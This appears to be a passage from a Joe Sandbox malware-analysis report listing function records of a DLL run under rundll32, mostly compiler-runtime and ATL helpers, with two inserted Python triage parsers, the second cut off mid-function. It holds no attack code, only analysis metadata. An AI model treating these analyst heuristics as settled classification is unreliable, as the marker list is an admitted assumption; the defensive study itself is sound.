                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                            • Opcode ID: 24677e321ac5ee4d1a04d18d3265de91d17da8cb2206eb616759a8d8e1f823ff
                                                                                                                                                            • Instruction ID: 61791d6681c3f4ad3dfa316d05c0a73c09026118eba7547e925a0575426d869f
                                                                                                                                                            • Opcode Fuzzy Hash: 24677e321ac5ee4d1a04d18d3265de91d17da8cb2206eb616759a8d8e1f823ff
                                                                                                                                                            • Instruction Fuzzy Hash: E231A236205A0882EAD39B65F8843DAB761E78C7E0F15C125FE98477E6DE7CC6498700
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                            • Opcode ID: dd0db9ab5b724912ec2026415335d458f002f1e7d8cb1aaf0fdef404c58ad89a
                                                                                                                                                            • Instruction ID: 3e18f53febbc17cc81b0eea23b64b476764291fb2201fd083bcd6cee7e18a8ac
                                                                                                                                                            • Opcode Fuzzy Hash: dd0db9ab5b724912ec2026415335d458f002f1e7d8cb1aaf0fdef404c58ad89a
                                                                                                                                                            • Instruction Fuzzy Hash: 99217F36201E0845EA929B65E8C43E96362F78CBE5F45C225BE1C477F6DF68C649C704
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFC7B
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCB1
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCDE
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCEF
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFD00
                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFD1B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: 5300be7ecbd16052b9e70f3c74c09ae5a72c476940d089165e31decfe542c1dd
                                                                                                                                                            • Instruction ID: 534ee9dd9013db177466b5afa872c7489071b3bf08e507150bf2a31af924fab8
                                                                                                                                                            • Opcode Fuzzy Hash: 5300be7ecbd16052b9e70f3c74c09ae5a72c476940d089165e31decfe542c1dd
                                                                                                                                                            • Instruction Fuzzy Hash: 06116D3430468C42FAEB67316A953FD52425F4C7F0F65C728B93657BD6DE28DA499300
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                            • API String ID: 2967684691-1405518554
                                                                                                                                                            • Opcode ID: 492b9f12d2017c85e3b9038361cbb09bb50bf92a85eee2bc8d229eea44332673
                                                                                                                                                            • Instruction ID: 257ebd258958192414c0201136383fc5e51e53a75ac9e0a2a349a042fac65805
                                                                                                                                                            • Opcode Fuzzy Hash: 492b9f12d2017c85e3b9038361cbb09bb50bf92a85eee2bc8d229eea44332673
                                                                                                                                                            • Instruction Fuzzy Hash: 86919F33705B888AFB92CF64D4903ED77A1EB887C4F048129EE891BA99DF34C659D350
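The function records above (API call sites, memory-dump provenance, API/String IDs, opcode and instruction fuzzy hashes) are the raw material for triage, and most of the entries in this part of the listing are MSVC C runtime and ATL helpers (`_invalid_parameter_noinfo`, `std::_Lockit`, locale facets, `CAtlBaseModule`) rather than the sample's own logic. The Python below is an added example, not Joe Sandbox's or this report's own code: it parses records in the layout shown here into structured objects, strips the "Download File" button text that the page rendering attaches to each Associated line, flags records whose API ID or String ID matches a heuristic list of runtime-helper markers, and builds a per-API call-site histogram. The record layout, the marker list (including treating the `api-ms-`/`ext-ms-` prefix check as the UCRT's API-set probing stub) and the embedded sample input are assumptions; the sample is constructed by copying three records from this listing.

```python
"""Triage helper for Joe Sandbox per-function records.

Added example; not code from Joe Sandbox or from this report. It assumes the
layout visible in the listing: section headers (APIs, Strings, Memory Dump
Source, Joe Sandbox IDA Plugin, Similarity) followed by bullet lines, with a
new record starting at each "APIs" header.
"""
import re
from dataclasses import dataclass, field

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# Assumption: these substrings in the API ID / String ID mark compiler-generated
# MSVC C runtime or ATL helpers ("api-ms-" is the UCRT API-set probing stub),
# not code specific to the sample. Tune the list for your own reports.
RUNTIME_MARKERS = ("_invalid_parameter_noinfo", "std::_", "Lockit", "Locinfo",
                   "Concurrency::", "Facet_Register", "CAtlBaseModule", "api-ms-")

# "GetProcAddress.KERNEL32(?,?,...), ref: 00000001800F00AC"
API_CALL_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
# "ERROR : ..., xrefs: 00000001800D663F"
STRING_RE = re.compile(r"^(.*), xrefs:\s*([0-9A-Fa-f]+)$")


@dataclass
class FunctionRecord:
    api_calls: list = field(default_factory=list)   # (api, module, call-site address)
    strings: list = field(default_factory=list)     # (string, xref address)
    fields: dict = field(default_factory=dict)      # "API ID", "Opcode ID", ...
    associated: list = field(default_factory=list)  # associated .sdmp dump names

    def is_runtime_helper(self) -> bool:
        text = self.fields.get("API ID", "") + " " + self.fields.get("String ID", "")
        return any(marker in text for marker in RUNTIME_MARKERS)


def parse_records(text: str) -> list:
    """Split a text dump of the function listing into FunctionRecord objects."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs" or current is None:
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if not line.startswith("•"):
            continue
        if current is None:  # listing cut mid-record
            current = FunctionRecord()
            records.append(current)
        body = line[1:].strip()
        if section == "APIs":
            m = API_CALL_RE.match(body)
            if m:
                current.api_calls.append((m.group(1), m.group(2), m.group(4)))
        elif section == "Strings":
            m = STRING_RE.match(body)
            if m:
                current.strings.append((m.group(1), m.group(2)))
        else:
            key, _, value = body.partition(":")
            key, value = key.strip(), value.strip()
            # The web page renders a "Download File" button after each dump name.
            value = value.removesuffix("Download File").strip()
            if key == "Associated":
                current.associated.append(value)
            else:
                current.fields[key] = value
    return records


def triage(records):
    """Separate runtime helpers from records that deserve manual review."""
    helpers = [r for r in records if r.is_runtime_helper()]
    candidates = [r for r in records if not r.is_runtime_helper()]
    return helpers, candidates


def api_histogram(records) -> dict:
    """Count MODULE!Api call sites across all records."""
    counts = {}
    for record in records:
        for api, module, _ in record.api_calls:
            counts[f"{module}!{api}"] = counts.get(f"{module}!{api}", 0) + 1
    return counts


# Constructed input: three records copied from this report's listing.
SAMPLE_REPORT = """
APIs
• GetProcAddress.KERNEL32(?,?,?,00000001800F0774,?,?,?,?,00000001800DB89A), ref: 00000001800F00AC
Strings
Memory Dump Source
• Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• Opcode ID: bb80c46524efd334e0948ec5fde6f5b3acf71997aa830e5d0c0555cb348075c0
APIs
• GetLastError.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFC7B
• FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCB1
• SetLastError.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFD1B
Similarity
• API ID: Value$ErrorLast
• String ID:
• Opcode ID: 5300be7ecbd16052b9e70f3c74c09ae5a72c476940d089165e31decfe542c1dd
APIs
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00000001800D663F
Similarity
• API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for r in triage(recs)[1]:
        print("review:", r.fields.get("API ID"), r.fields.get("Opcode ID"))
    print(api_histogram(recs))
```

Run it against a saved copy of the whole listing rather than the embedded sample to get the full split; records left in the candidate list (here the FlsSetValue/GetLastError thread-data setup) are where an analyst's time should go, and the Opcode IDs printed for them can be compared across reports to spot reused payload code.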
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00000001800D663F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                            • API String ID: 3511171328-631824599
                                                                                                                                                            • Opcode ID: 3b3216ce6001b72eff62068510a6f0b8e4e3afcdb252984c26514cbf29c63a7a
                                                                                                                                                            • Instruction ID: 283167450af4393c368174901eda81c10499684aeee4801c6a5cb384dfff630c
                                                                                                                                                            • Opcode Fuzzy Hash: 3b3216ce6001b72eff62068510a6f0b8e4e3afcdb252984c26514cbf29c63a7a
                                                                                                                                                            • Instruction Fuzzy Hash: 55117732610B4497FB869B22E5493D932A1FB58755F40D115E64983A60EF78D278C710
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ef292095189d688244afeea7f6b845bb184af88f8cb6fafd7eee9d63f68d16f4
                                                                                                                                                            • Instruction ID: 975f7225a3a63e299421f78f145c918a74a67d24bf9757e7338846c982cfeb7d
                                                                                                                                                            • Opcode Fuzzy Hash: ef292095189d688244afeea7f6b845bb184af88f8cb6fafd7eee9d63f68d16f4
                                                                                                                                                            • Instruction Fuzzy Hash: D4B1D232616B8886EB96CF69E4403ED77A4F748FD8F149119EE4903BA8DF38C599C340
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2138705365-0
                                                                                                                                                            • Opcode ID: e6622a1003ff05e1210d2c7c0291edc59dcda77f184723c5f9fea43b66e241c3
                                                                                                                                                            • Instruction ID: 212c56f00f68a2ef71f83bc1973b783350eb29f8722c30a54f44c08f54aa4c97
                                                                                                                                                            • Opcode Fuzzy Hash: e6622a1003ff05e1210d2c7c0291edc59dcda77f184723c5f9fea43b66e241c3
                                                                                                                                                            • Instruction Fuzzy Hash: 8B81CF72614F8885EB528F25E45039D7360F789BE4F409216FB9C03BAAEF78C698C744
                                                                                                                                                            APIs
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFD53
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFD72
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFD9A
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFDAB
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFDBC
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                            • Opcode ID: 64e394b7381dc10eb27666501ca5dcdb65787ad9e54def4269ffa76a45e47e76
                                                                                                                                                            • Instruction ID: ff9aa437c0595ea1eb9d58ea7ad14249b49a3c0f1692886f92c925acf78205b5
                                                                                                                                                            • Opcode Fuzzy Hash: 64e394b7381dc10eb27666501ca5dcdb65787ad9e54def4269ffa76a45e47e76
                                                                                                                                                            • Instruction Fuzzy Hash: 40118B3030868D42FAEAA3216D513F962474F8C3F0F55C328B9396ABD6DE28CF499300
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$Thread$CreateCurrent
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2930290305-0
                                                                                                                                                            • Opcode ID: 5bfa75c5eac8daa5e5b124f9845cd5dbd0aa6498d9a00ed29e9f5e9b47d3ee95
                                                                                                                                                            • Instruction ID: 75230aab8a6d904f90b672090fcd263d29a486a149c04a4e1d63e4c13d8814a9
                                                                                                                                                            • Opcode Fuzzy Hash: 5bfa75c5eac8daa5e5b124f9845cd5dbd0aa6498d9a00ed29e9f5e9b47d3ee95
                                                                                                                                                            • Instruction Fuzzy Hash: 93118235B04F4482EB968B25F85439DA2A1FB8CBE4F448625FF6943BE4DF38C6598700
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                            • API String ID: 2775327233-1405518554
                                                                                                                                                            • Opcode ID: 5b311788567aa043f92aba488ebe8b2e5c9052ebe229d9d5e94981fd2abaa2a8
                                                                                                                                                            • Instruction ID: 9e5a5e08860c88efdfc9631ff2a57989cd1dbfec02a922697c63f09b54788598
                                                                                                                                                            • Opcode Fuzzy Hash: 5b311788567aa043f92aba488ebe8b2e5c9052ebe229d9d5e94981fd2abaa2a8
                                                                                                                                                            • Instruction Fuzzy Hash: 41516E33312A48DAEB96DF70D4903EC33A4EB58788F448125FF4967A95DE34C61AC358
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                            • String ID: string too long
                                                                                                                                                            • API String ID: 3668304517-2556327735
                                                                                                                                                            • Opcode ID: a3acfd3d82963a706bc48d948a37a32f85189e9a0e2e76b76b124625f236f818
                                                                                                                                                            • Instruction ID: 5fc0c0a601f6c4d82b55d0d521c46b81e316b69cb665f141bfa2e52588e3f1ef
                                                                                                                                                            • Opcode Fuzzy Hash: a3acfd3d82963a706bc48d948a37a32f85189e9a0e2e76b76b124625f236f818
                                                                                                                                                            • Instruction Fuzzy Hash: 6321D4B271168CC1EE6A56A694493DC2242931EBE1F60C711FB3D0FBD6DE3986C94301
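The function records above all follow one shape: an APIs list with call-site addresses, a Strings list with xrefs, the memory dump the function was lifted from, and a Similarity block of API / String / Opcode / Instruction identifiers. Several of them are compiler runtime rather than malware logic: "ERROR : Unable to initialize critical section in CAtlBaseModule" is the trace string from ATL's CAtlBaseModule constructor, and the FlsGetValue/FlsSetValue and _invalid_parameter_noinfo_noreturn records are MSVC CRT helpers. The Python below is an added example, not part of the Joe Sandbox report or its tooling; it parses records in this shape and separates runtime helpers from functions worth opening in the disassembly. SAMPLE is copied from three of the records above (argument lists and the repeated dump-source lines shortened), and RUNTIME_MARKERS is the analyst's own heuristic list, not a Joe Sandbox classification.

```python
"""Parse and triage Joe Sandbox 'Similarity' function records like the ones above.
Added example, not Joe Sandbox code. SAMPLE is copied from three records on this
page (argument lists and repeated dump-source lines shortened); the tokens in
RUNTIME_MARKERS are an analyst's assumption about MSVC CRT / ATL helper code."""
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00000001800D663F
Memory Dump Source
• Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
Similarity
• API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3511171328-631824599
• Opcode ID: 3b3216ce6001b72eff62068510a6f0b8e4e3afcdb252984c26514cbf29c63a7a
• Instruction ID: 283167450af4393c368174901eda81c10499684aeee4801c6a5cb384dfff630c
• Opcode Fuzzy Hash: 3b3216ce6001b72eff62068510a6f0b8e4e3afcdb252984c26514cbf29c63a7a
• Instruction Fuzzy Hash: 55117732610B4497FB869B22E5493D932A1FB58755F40D115E64983A60EF78D278C710
APIs
• FlsGetValue.KERNEL32(?,?,?,00000001800DB982), ref: 00000001800EFD53
• FlsSetValue.KERNEL32(?,?,?,00000001800DB982), ref: 00000001800EFD72
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 64e394b7381dc10eb27666501ca5dcdb65787ad9e54def4269ffa76a45e47e76
• Instruction ID: ff9aa437c0595ea1eb9d58ea7ad14249b49a3c0f1692886f92c925acf78205b5
• Opcode Fuzzy Hash: 64e394b7381dc10eb27666501ca5dcdb65787ad9e54def4269ffa76a45e47e76
• Instruction Fuzzy Hash: 40118B3030868D42FAEAA3216D513F962474F8C3F0F55C328B9396ABD6DE28CF499300
APIs
Similarity
• API ID: ErrorLast$Thread$CreateCurrent
• String ID:
• API String ID: 2930290305-0
• Opcode ID: 5bfa75c5eac8daa5e5b124f9845cd5dbd0aa6498d9a00ed29e9f5e9b47d3ee95
• Instruction ID: 75230aab8a6d904f90b672090fcd263d29a486a149c04a4e1d63e4c13d8814a9
• Opcode Fuzzy Hash: 5bfa75c5eac8daa5e5b124f9845cd5dbd0aa6498d9a00ed29e9f5e9b47d3ee95
• Instruction Fuzzy Hash: 93118235B04F4482EB968B25F85439DA2A1FB8CBE4F448625FF6943BE4DF38C6598700
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_CALL = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
FIELD = re.compile(r"^• ([^:]+?):\s*(.*)$")
# Analyst's assumption: markers of MSVC runtime / ATL code compiled into the DLL.
RUNTIME_MARKERS = ("_invalid_parameter_noinfo", "__std_exception", "std::", "Locinfo",
                   "CAtlBaseModule", "FlsGetValue", "FlsSetValue")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (api name, module, call site) tuples
    strings: list = field(default_factory=list)  # referenced string literals, xrefs dropped
    fields: dict = field(default_factory=dict)   # "Opcode ID", "API String ID", ...

    def api_string_id(self):
        """Split 'API String ID: <api hash>-<string hash>' into ints (None if blank)."""
        value = self.fields.get("API String ID", "")
        if "-" not in value:
            return None
        api_hash, string_hash = value.split("-", 1)
        return int(api_hash), int(string_hash)


def parse_records(text):
    """One record per '• Instruction Fuzzy Hash' line; section headers carry no value."""
    records, cur, section = [], FunctionRecord(), None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        if line in HEADERS:
            section = line
        elif section == "APIs" and (m := API_CALL.match(line)):
            cur.apis.append((m.group(1), m.group(2), m.group(4)))
        elif section == "Strings":
            cur.strings.append(line[2:].split(", xrefs:")[0])
        elif m := FIELD.match(line):
            cur.fields[m.group(1)] = m.group(2)
            if m.group(1) == "Instruction Fuzzy Hash":   # last field of every record
                records.append(cur)
                cur, section = FunctionRecord(), None
    return records


def classify(rec):
    """'empty': no API or string evidence; 'runtime': a CRT/ATL marker was seen;
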